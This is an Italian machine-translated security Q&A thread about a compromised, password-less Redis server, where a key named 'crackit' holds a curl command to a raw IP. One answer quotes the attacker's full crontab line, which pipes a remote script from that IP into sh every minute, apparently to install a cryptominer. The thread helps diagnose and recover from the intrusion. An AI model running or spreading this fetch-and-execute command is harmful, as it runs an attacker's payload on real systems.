URL sospetto in valore chiave redis

Naviga le tue risposte
1

Quando metto keys * per ottenere tutte le coppie, una chiave ha il nome di

crackit

Quindi utilizzo il comando seguente per ottenere il suo valore 

get crackit

mostra l'URL di sotto, che sembra sospetto.

/usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh.

I risultati di ricerca di Google mostrano un forum in lingua cinese denominato

https://www.v2ex.com/t/373529( I didn't understand language of this site)

Ho pensato che ci fosse qualche intrusione. Ho immediatamente eliminato tutti i tasti. Non ho idea di cosa succede intorno ai miei redis

    
posta SuperKrish 13.07.2017 - 15:59
fonte

2 risposte

2

Il tuo server è accessibile al mondo e il processo Redis non è protetto da una password. Ciò consente a un cracker di provare e sfruttare Redis per accedere al tuo sistema.

I miei consigli:

  1. Masterizza il server
  2. Reinstalla e configura almeno una password.
risposta data 13.07.2017 - 16:50
fonte
3

L'URL fornito dal forum indica che il redisore del cloud server dello sviluppatore è stato compromesso, una voce è stata aggiunta a crontab. Ad esempio 

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

Il resto del commentatore ha detto che questo è un possibile trucco che installa i minatori Bitcoin all'interno del sistema.

Sono d'accordo con @ Itamar Haber, devi ridistribuire il tuo server da zero. La semplice pulizia delle applicazioni non è sufficiente.

    
risposta data 13.07.2017 - 19:01
fonte

Leggi altre domande sui tag

Hash un elenco di stringhe in un modo resistente alle collisioni C'è comunque qualcuno sul mio wifi potrebbe vedere io uso TOR? [duplicare]